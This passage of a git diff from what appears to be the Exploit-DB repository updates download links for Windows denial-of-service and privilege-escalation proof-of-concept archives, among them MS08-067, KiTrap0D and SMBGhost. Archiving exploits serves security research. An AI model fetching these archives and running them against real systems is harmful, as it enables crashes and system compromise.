b/exploits/windows/dos/47279.txt @@ -114,4 +114,4 @@ Notes: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47279.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47279.zip \ No newline at end of file diff --git a/exploits/windows/dos/47381.txt b/exploits/windows/dos/47381.txt index d4a088762..bbd7019e2 100644 --- a/exploits/windows/dos/47381.txt +++ b/exploits/windows/dos/47381.txt @@ -106,4 +106,4 @@ The issue reproduces on a fully updated Windows 7 and Windows 10 1709; we haven' Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47381.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47381.zip \ No newline at end of file diff --git a/exploits/windows/dos/47382.txt b/exploits/windows/dos/47382.txt index e2e5fb7b2..40abe192d 100644 --- a/exploits/windows/dos/47382.txt +++ b/exploits/windows/dos/47382.txt @@ -76,4 +76,4 @@ Attached is a pair of minimized PoC fonts, original fonts, and HTML files to rep Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47382.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47382.zip \ No newline at end of file diff --git a/exploits/windows/dos/47414.txt b/exploits/windows/dos/47414.txt index 62f320903..50f649f84 100644 --- a/exploits/windows/dos/47414.txt +++ b/exploits/windows/dos/47414.txt @@ -8,4 +8,4 @@ C:\> certutil.exe testcase.crt Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47414.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47414.zip \ No newline at end of file diff --git a/exploits/windows/dos/47484.txt b/exploits/windows/dos/47484.txt index 2a442cba9..1a56a98fa 100644 --- a/exploits/windows/dos/47484.txt +++ b/exploits/windows/dos/47484.txt @@ -78,4 +78,4 @@ Attached is an archive with the proof-of-concept mutated TTF file, the original Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47484.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47484.zip \ No newline at end of file diff --git a/exploits/windows/dos/47485.txt b/exploits/windows/dos/47485.txt index 2f2818e7a..bc9a10909 100644 --- a/exploits/windows/dos/47485.txt +++ b/exploits/windows/dos/47485.txt @@ -77,4 +77,4 @@ Attached is an archive with a minimized proof-of-concept PE image, the original Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47485.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47485.zip \ No newline at end of file diff --git a/exploits/windows/dos/47486.txt b/exploits/windows/dos/47486.txt index 67d568bcb..801241bd9 100644 --- a/exploits/windows/dos/47486.txt +++ b/exploits/windows/dos/47486.txt @@ -89,4 +89,4 @@ Attached is an archive with a minimized proof-of-concept PE image, the original Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47486.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47486.zip \ No newline at end of file diff --git a/exploits/windows/dos/47487.txt b/exploits/windows/dos/47487.txt index f54ebb144..c458eabd9 100644 --- a/exploits/windows/dos/47487.txt +++ b/exploits/windows/dos/47487.txt @@ -83,4 +83,4 @@ Attached is an archive with a minimized proof-of-concept PE image, the original Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47487.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47487.zip \ No newline at end of file diff --git a/exploits/windows/dos/47488.txt b/exploits/windows/dos/47488.txt index 12670a897..c082982e3 100644 --- a/exploits/windows/dos/47488.txt +++ b/exploits/windows/dos/47488.txt @@ -90,4 +90,4 @@ Attached is an archive with a minimized proof-of-concept PE image, the original Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47488.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47488.zip \ No newline at end of file diff --git a/exploits/windows/dos/47489.txt b/exploits/windows/dos/47489.txt index cf8e1adc5..95a9a6e35 100644 --- a/exploits/windows/dos/47489.txt +++ b/exploits/windows/dos/47489.txt @@ -76,4 +76,4 @@ Attached is an archive with two proof-of-concept PE images and the corresponding Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47489.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47489.zip \ No newline at end of file diff --git a/exploits/windows/dos/47528.txt b/exploits/windows/dos/47528.txt index 59e00f838..2ce1afd26 100644 --- a/exploits/windows/dos/47528.txt +++ b/exploits/windows/dos/47528.txt @@ -82,4 +82,4 @@ Notes: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47528.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47528.zip \ No newline at end of file diff --git a/exploits/windows/dos/47609.txt b/exploits/windows/dos/47609.txt index 5737ee58a..fcda135ea 100644 --- a/exploits/windows/dos/47609.txt +++ b/exploits/windows/dos/47609.txt @@ -78,4 +78,4 @@ Notes: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47609.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47609.zip \ No newline at end of file diff --git a/exploits/windows/dos/47610.txt b/exploits/windows/dos/47610.txt index eaaefbd57..22bdb5291 100644 --- a/exploits/windows/dos/47610.txt +++ b/exploits/windows/dos/47610.txt @@ -139,4 +139,4 @@ Mutated code: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47610.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47610.zip \ No newline at end of file diff --git a/exploits/windows/dos/47769.txt b/exploits/windows/dos/47769.txt index 007941fa8..39acf7c29 100644 --- a/exploits/windows/dos/47769.txt +++ b/exploits/windows/dos/47769.txt @@ -86,4 +86,4 @@ Notes: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47769.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47769.zip \ No newline at end of file diff --git a/exploits/windows/dos/47964.cpp b/exploits/windows/dos/47964.cpp index e8490dbec..d7fda2c52 100644 --- a/exploits/windows/dos/47964.cpp +++ b/exploits/windows/dos/47964.cpp @@ -2,8 +2,8 @@ /* EDB Note: -- Download (Binary) ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47964-1.exe -- Download (Source) ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47964-2.zip +- Download (Binary) ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47964-1.exe +- Download (Source) ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47964-2.zip */ diff --git a/exploits/windows/dos/48216.md b/exploits/windows/dos/48216.md index 34c3b6252..f88318e33 100644 --- a/exploits/windows/dos/48216.md +++ b/exploits/windows/dos/48216.md @@ -1,6 +1,6 @@ # CVE-2020-0796 PoC aka CoronaBlue aka SMBGhost -Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48216.zip +Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48216.zip ## Usage diff --git a/exploits/windows/dos/5327.txt b/exploits/windows/dos/5327.txt index ecc2c090f..b755bfcfd 100644 --- a/exploits/windows/dos/5327.txt +++ b/exploits/windows/dos/5327.txt @@ -8,6 +8,6 @@ Download the file anywhere excluding on desktop and try to browse it with the Wi - Website - http://iron-team.com/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5327.doc (2008-Iron.Team.hack.the.planet.doc) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5327.doc (2008-Iron.Team.hack.the.planet.doc) # milw0rm.com [2008-03-31] \ No newline at end of file diff --git a/exploits/windows/dos/5687.txt b/exploits/windows/dos/5687.txt index 91059ee56..0265348c2 100644 --- a/exploits/windows/dos/5687.txt +++ b/exploits/windows/dos/5687.txt @@ -4,6 +4,6 @@ the reader deadly crash when a malformed Pdf file is opened: greetz to : Deimos, benjilenoob, Berga , http://spiritofhack.net/ -Poc : https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5687.pdf (2008-HI2.pdf) +Poc : https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5687.pdf (2008-HI2.pdf) # milw0rm.com [2008-05-29] \ No newline at end of file diff --git a/exploits/windows/dos/6330.txt b/exploits/windows/dos/6330.txt index 615ed5638..cf057d327 100644 --- a/exploits/windows/dos/6330.txt +++ b/exploits/windows/dos/6330.txt @@ -21,6 +21,6 @@ and causes Internet explorer to close silently. This is work in progress , i am still trying to make it run arbitary code. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6330.rar (2008-EMF_DOS.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6330.rar (2008-EMF_DOS.rar) # milw0rm.com [2008-08-29] \ No newline at end of file diff --git a/exploits/windows/dos/6560.txt b/exploits/windows/dos/6560.txt index e0ad4dd80..0cd7ec7e2 100644 --- a/exploits/windows/dos/6560.txt +++ b/exploits/windows/dos/6560.txt @@ -1,6 +1,6 @@ MS Windows Wordpad .doc File Local Denial of Service PoC author: securfrog -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6560.rar (2008-crash.doc.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6560.rar (2008-crash.doc.rar) # milw0rm.com [2008-09-25] \ No newline at end of file diff --git a/exploits/windows/dos/6565.txt b/exploits/windows/dos/6565.txt index 2aabf1aec..ef0dd15e8 100644 --- a/exploits/windows/dos/6565.txt +++ b/exploits/windows/dos/6565.txt @@ -20,6 +20,6 @@ By: Aodrulez, Email: f3arm3d3ar@gmail.com ------------------------------------------------------------------ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6565.rar (2008-test7.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6565.rar (2008-test7.rar) # milw0rm.com [2008-09-25] \ No newline at end of file diff --git a/exploits/windows/dos/6616.txt b/exploits/windows/dos/6616.txt index 1d50ed109..0c6e93cd6 100644 --- a/exploits/windows/dos/6616.txt +++ b/exploits/windows/dos/6616.txt @@ -10,6 +10,6 @@ EBP 0007E358 Access Violation [FFFFFFFF] ---| -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6616.zip (2008-ExplorerDOS.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6616.zip (2008-ExplorerDOS.zip) # milw0rm.com [2008-09-28] \ No newline at end of file diff --git a/exploits/windows/dos/6658.txt b/exploits/windows/dos/6658.txt index b757cd9f7..dac49c76f 100644 --- a/exploits/windows/dos/6658.txt +++ b/exploits/windows/dos/6658.txt @@ -25,6 +25,6 @@ http://www.zeroscience.org ------------------------------------------------------------------------------------------------------------------------------ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6658.rar (2008-vba32_poc.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6658.rar (2008-vba32_poc.rar) # milw0rm.com [2008-10-03] \ No newline at end of file diff --git a/exploits/windows/dos/6732.txt b/exploits/windows/dos/6732.txt index ff6e5a6be..1f5cf3442 100644 --- a/exploits/windows/dos/6732.txt +++ b/exploits/windows/dos/6732.txt @@ -12,6 +12,6 @@ Causes Windows explorer and Internet explorer to crash. You can run arbitary code. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6732.rar (2008-emf_MS08-046.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6732.rar (2008-emf_MS08-046.rar) # milw0rm.com [2008-10-12] \ No newline at end of file diff --git a/exploits/windows/dos/677.txt b/exploits/windows/dos/677.txt index 47a824ba1..05243d00f 100644 --- a/exploits/windows/dos/677.txt +++ b/exploits/windows/dos/677.txt @@ -20,7 +20,7 @@ Solutions: There was no response. Exploit: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/677.grs (c_skin.grs) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/677.grs (c_skin.grs) When you copy or click this link, getright automaticly download and try to load crafted skin and will trigger buffer overflow diff --git a/exploits/windows/dos/6824.txt b/exploits/windows/dos/6824.txt index 0c0e2b72a..80eea1105 100644 --- a/exploits/windows/dos/6824.txt +++ b/exploits/windows/dos/6824.txt @@ -21,6 +21,6 @@ You need a slash on the stack prior to the input buffer. So play around a bit, you'll get it working reliably... poc: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6824.zip (2008-ms08-067.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6824.zip (2008-ms08-067.zip) # milw0rm.com [2008-10-23] \ No newline at end of file diff --git a/exploits/windows/dos/7178.txt b/exploits/windows/dos/7178.txt index e568eded7..85200f1cf 100644 --- a/exploits/windows/dos/7178.txt +++ b/exploits/windows/dos/7178.txt @@ -19,6 +19,6 @@ ESI 04354E18 EDI 04352100 EIP 775781CB ntdll.775781CB -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/7178.zip (2008-BitDefenderDOS.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/7178.zip (2008-BitDefenderDOS.zip) # milw0rm.com [2008-11-20] \ No newline at end of file diff --git a/exploits/windows/dos/770.txt b/exploits/windows/dos/770.txt index cf3beb2b8..5ddf438b3 100644 --- a/exploits/windows/dos/770.txt +++ b/exploits/windows/dos/770.txt @@ -15,7 +15,7 @@ will can cause the remote system to crash. --Uncompleted qtif image file header http://www.atmacasoft.com/exp/vuln.qtif.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/770.qtif (vuln.qtif) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/770.qtif (vuln.qtif) 00000000 0000 005E 6964 7363 0000 0056 6A70 6567 0000 0000 0000 0000 0000 0000 ...^idsc...Vjpeg............ 0000001C 6170 706C 0000 0000 0000 0200 0100 016D 0048 0000 0048 0000 0000 724D appl...........m.H...H....rM diff --git a/exploits/windows/dos/8090.txt b/exploits/windows/dos/8090.txt index 8d0b5c9e1..75ba9eb4f 100644 --- a/exploits/windows/dos/8090.txt +++ b/exploits/windows/dos/8090.txt @@ -1,5 +1,5 @@ causes an exception at 41414141 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8090.pdf (2009-41414141.pdf) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8090.pdf (2009-41414141.pdf) # milw0rm.com [2009-02-23] \ No newline at end of file diff --git a/exploits/windows/dos/8281.txt b/exploits/windows/dos/8281.txt index 4da8f4547..a724e1cae 100644 --- a/exploits/windows/dos/8281.txt +++ b/exploits/windows/dos/8281.txt @@ -4,6 +4,6 @@ Write up by redsand@blacksecurity.org : http://bl4cksecurity.blogspot.com/2009/0 Credits to mIKEJONES for providing the .EMF Crash down: http://www.blacksecurity.org/voltage-exploit.emf -back: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8281.emf (2009-voltage-exploit.emf) +back: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8281.emf (2009-voltage-exploit.emf) # milw0rm.com [2009-03-24] \ No newline at end of file diff --git a/exploits/windows/dos/8306.txt b/exploits/windows/dos/8306.txt index d0308fbae..8c61d074e 100644 --- a/exploits/windows/dos/8306.txt +++ b/exploits/windows/dos/8306.txt @@ -1,5 +1,5 @@ Firefox memory corruption PoC/DoS in XUL (XML) parser -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8306.rar (2009-Firefox-XUL-0day-PoC.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8306.rar (2009-Firefox-XUL-0day-PoC.rar) # milw0rm.com [2009-03-30] \ No newline at end of file diff --git a/exploits/windows/dos/8837.txt b/exploits/windows/dos/8837.txt index 312cb6922..5b1a0e8a9 100644 --- a/exploits/windows/dos/8837.txt +++ b/exploits/windows/dos/8837.txt @@ -56,7 +56,7 @@ ################################################################################ >>> *** PoC: http://www.zeroscience.org/codes/aimp2_evil.mp3 ~2.92 MB <<< ->>> *** PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8837.mp3 (2009-aimp2_evil.mp3) ~2.92 MB <<< +>>> *** PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8837.mp3 (2009-aimp2_evil.mp3) ~2.92 MB <<< ################################################################################ diff --git a/exploits/windows/dos/9167.txt b/exploits/windows/dos/9167.txt index 749f5fb0f..f341d6629 100644 --- a/exploits/windows/dos/9167.txt +++ b/exploits/windows/dos/9167.txt @@ -23,7 +23,7 @@ cccccccc ?? == *** Proof Of Concept: http://zeroscience.org/codes/aimp2_evil.mp3 http://www.zeroscience.mk/old/codes/aimp2_evil.mp3 - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9167.mp3 (2009-aimp2_evil.mp3) + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9167.mp3 (2009-aimp2_evil.mp3) ** Note: The same PoC used in: - http://secunia.com/advisories/35305/ diff --git a/exploits/windows/dos/9169.py b/exploits/windows/dos/9169.py index d825463eb..a5748a89c 100755 --- a/exploits/windows/dos/9169.py +++ b/exploits/windows/dos/9169.py @@ -75,7 +75,7 @@ # # # - 1. http://zeroscience.org/codes/aimp2_evil.mp3 # # # - # - 2. https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9167.mp3 (2009-aimp2_evil.mp3) (mirror) # + # - 2. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9167.mp3 (2009-aimp2_evil.mp3) (mirror) # # # # - 3. http://securityreason.com/download/11/13 (mirror) # # # diff --git a/exploits/windows/dos/9170.txt b/exploits/windows/dos/9170.txt index b76952a68..a7f77ed29 100644 --- a/exploits/windows/dos/9170.txt +++ b/exploits/windows/dos/9170.txt @@ -44,7 +44,7 @@ http://www.zeroscience.org/ PoC: 1. http://zeroscience.org/codes/aimp2_evil.mp3 - 2. https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9167.mp3 (2009-aimp2_evil.mp3) + 2. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9167.mp3 (2009-aimp2_evil.mp3) 3. http://securityreason.com/download/11/13 # milw0rm.com [2009-07-16] \ No newline at end of file diff --git a/exploits/windows/dos/9417.txt b/exploits/windows/dos/9417.txt index b1c2a5495..ffc000afe 100644 --- a/exploits/windows/dos/9417.txt +++ b/exploits/windows/dos/9417.txt @@ -1,6 +1,6 @@ MS Windows 2003 (EOT File) BSOD Crash Exploit author: webDEViL -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9417.zip (2009-wwbsod.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9417.zip (2009-wwbsod.zip) # milw0rm.com [2009-08-11] \ No newline at end of file diff --git a/exploits/windows/local/11139.c b/exploits/windows/local/11139.c index a3193aff1..d9aae3b66 100644 --- a/exploits/windows/local/11139.c +++ b/exploits/windows/local/11139.c @@ -517,4 +517,4 @@ Stack: void print(char* msg) { printf("\n[*]%s\n",msg); - } + } \ No newline at end of file diff --git a/exploits/windows/local/11199.txt b/exploits/windows/local/11199.txt index 33b0ce06c..6d82c466a 100644 --- a/exploits/windows/local/11199.txt +++ b/exploits/windows/local/11199.txt @@ -1,4 +1,4 @@ -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11199.zip (KiTrap0D.zip) +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11199.zip (KiTrap0D.zip) E-DB Note: Make sure to run "vdmallowed.exe" (pre-compiled) inside the subfolder. @@ -158,7 +158,7 @@ Possibly naive example code for triggering this condition is available from the link below. http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11199.zip (KiTrap0D.zip) +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11199.zip (KiTrap0D.zip) The code has been tested on Windows XP, Windows Server 2003/2008, Windows Vista and Windows 7. Support for other affected operating systems is left as an diff --git a/exploits/windows/local/11987.txt b/exploits/windows/local/11987.txt index b63c80acd..ee30624e8 100644 --- a/exploits/windows/local/11987.txt +++ b/exploits/windows/local/11987.txt @@ -24,7 +24,7 @@ With Foxit Reader, no warning is displayed: I’m not publishing my PoC PDF yet, but you can download a PDF that will just launch cmd.exe here. Use it to test your PDF reader: - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11987.zip (launch-action-cmd.zip) + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11987.zip (launch-action-cmd.zip) With Adobe Reader, the only thing preventing execution is a warning. Disabling JavaScript will not prevent this (I don’t use JavaScript in my PoC PDF), and patching Adobe Reader isn’t possible (I’m not exploiting a vulnerability, just being creative with the PDF language specs). diff --git a/exploits/windows/local/12497.c b/exploits/windows/local/12497.c index 75352068d..aaf971042 100644 --- a/exploits/windows/local/12497.c +++ b/exploits/windows/local/12497.c @@ -135,4 +135,4 @@ s[i]=alphanum[rand()%(sizeof(alphanum)-1)]; } s[len]=0; - } + } \ No newline at end of file diff --git a/exploits/windows/local/12710.c b/exploits/windows/local/12710.c index 1620ba4f7..f1b55166c 100644 --- a/exploits/windows/local/12710.c +++ b/exploits/windows/local/12710.c @@ -281,7 +281,4 @@ printf("OK!\n "); getchar(); return 0; -} - - - +} \ No newline at end of file diff --git a/exploits/windows/local/14403.txt b/exploits/windows/local/14403.txt index fa9efa42c..896553641 100644 --- a/exploits/windows/local/14403.txt +++ b/exploits/windows/local/14403.txt @@ -5,7 +5,7 @@ From: http://www.ivanlef0u.tuxfamily.org/?p=411 3. Look at your logs. http://ivanlef0u.nibbles.fr/repo/suckme.rar -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14403.rar (suckme.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14403.rar (suckme.rar) Tested under XP SP3. diff --git a/exploits/windows/local/14610.txt b/exploits/windows/local/14610.txt index f72c81724..0bae2c586 100644 --- a/exploits/windows/local/14610.txt +++ b/exploits/windows/local/14610.txt @@ -5,4 +5,4 @@ Microsoft Windows is prone to a local privilege-escalation vulnerability. An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful exploits will result in the complete compromise of affected computers. Code: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14610.zip (Chimichurri-CVE-2010-2554.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14610.zip (Chimichurri-CVE-2010-2554.zip) \ No newline at end of file diff --git a/exploits/windows/local/14744.c b/exploits/windows/local/14744.c index 1836116cc..139441a04 100644 --- a/exploits/windows/local/14744.c +++ b/exploits/windows/local/14744.c @@ -22,4 +22,4 @@ int evil() return 0; } -// POC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14744.zip \ No newline at end of file +// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14744.zip \ No newline at end of file diff --git a/exploits/windows/local/14745.c b/exploits/windows/local/14745.c index 3668a2122..1f5920500 100644 --- a/exploits/windows/local/14745.c +++ b/exploits/windows/local/14745.c @@ -25,4 +25,4 @@ int evil() return 0; } -// POC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14745.zip \ No newline at end of file +// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14745.zip \ No newline at end of file diff --git a/exploits/windows/local/14746.c b/exploits/windows/local/14746.c index 9661c19e3..7fde79246 100644 --- a/exploits/windows/local/14746.c +++ b/exploits/windows/local/14746.c @@ -24,4 +24,4 @@ int evil() return 0; } -// POC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14746.zip \ No newline at end of file +// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14746.zip \ No newline at end of file diff --git a/exploits/windows/local/14747.c b/exploits/windows/local/14747.c index 263ab43fe..7c113b45e 100644 --- a/exploits/windows/local/14747.c +++ b/exploits/windows/local/14747.c @@ -26,4 +26,4 @@ int evil() return 0; } -// POC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14747.zip \ No newline at end of file +// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14747.zip \ No newline at end of file diff --git a/exploits/windows/local/14748.txt b/exploits/windows/local/14748.txt index 412d8da86..14cab9013 100644 --- a/exploits/windows/local/14748.txt +++ b/exploits/windows/local/14748.txt @@ -27,6 +27,6 @@ utorrent.exe directory, the payload will be executed with users' credentials. -rpcrtremote.dll -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14748.tar.gz (Dr_IDE.bind.dll.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14748.tar.gz (Dr_IDE.bind.dll.tar.gz) #[pocoftheday.blogspot.com] \ No newline at end of file diff --git a/exploits/windows/local/14758.c b/exploits/windows/local/14758.c index ebb9251aa..c2bc1d7c3 100644 --- a/exploits/windows/local/14758.c +++ b/exploits/windows/local/14758.c @@ -24,4 +24,4 @@ int evil() return 0; } -// POC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14758.zip \ No newline at end of file +// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14758.zip \ No newline at end of file diff --git a/exploits/windows/local/14764.c b/exploits/windows/local/14764.c index 90b7cb358..0bce51bf4 100644 --- a/exploits/windows/local/14764.c +++ b/exploits/windows/local/14764.c @@ -25,4 +25,4 @@ int evil() return 0; } -// POC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14764.zip \ No newline at end of file +// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14764.zip \ No newline at end of file diff --git a/exploits/windows/local/14765.c b/exploits/windows/local/14765.c index d17993971..ab4d288a5 100644 --- a/exploits/windows/local/14765.c +++ b/exploits/windows/local/14765.c @@ -26,4 +26,4 @@ int evil() return 0; } -// POC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14765.zip (mpc-poc.zip) \ No newline at end of file +// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14765.zip (mpc-poc.zip) \ No newline at end of file diff --git a/exploits/windows/local/14769.c b/exploits/windows/local/14769.c index ae95e3938..5adb1e781 100644 --- a/exploits/windows/local/14769.c +++ b/exploits/windows/local/14769.c @@ -26,4 +26,4 @@ int evil() return 0; } -// POC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14769.rar (nvidia-poc.rar) \ No newline at end of file +// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14769.rar (nvidia-poc.rar) \ No newline at end of file diff --git a/exploits/windows/local/14780.c b/exploits/windows/local/14780.c index cbc7271b5..5ba46ff31 100644 --- a/exploits/windows/local/14780.c +++ b/exploits/windows/local/14780.c @@ -21,6 +21,4 @@ BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { alpdaemon(); return 0; -} - - +} \ No newline at end of file diff --git a/exploits/windows/local/14944.py b/exploits/windows/local/14944.py index c0e732ddd..be98f2930 100755 --- a/exploits/windows/local/14944.py +++ b/exploits/windows/local/14944.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-8-microsoft-office-visio-dxf-file-stack-overflow/ - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14944.zip (moaub-8-exploit.zip) + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14944.zip (moaub-8-exploit.zip) ''' ''' diff --git a/exploits/windows/local/14966.py b/exploits/windows/local/14966.py index 1395e7040..470a2f7ab 100755 --- a/exploits/windows/local/14966.py +++ b/exploits/windows/local/14966.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-10-excel-rtd-memory-corruption/ 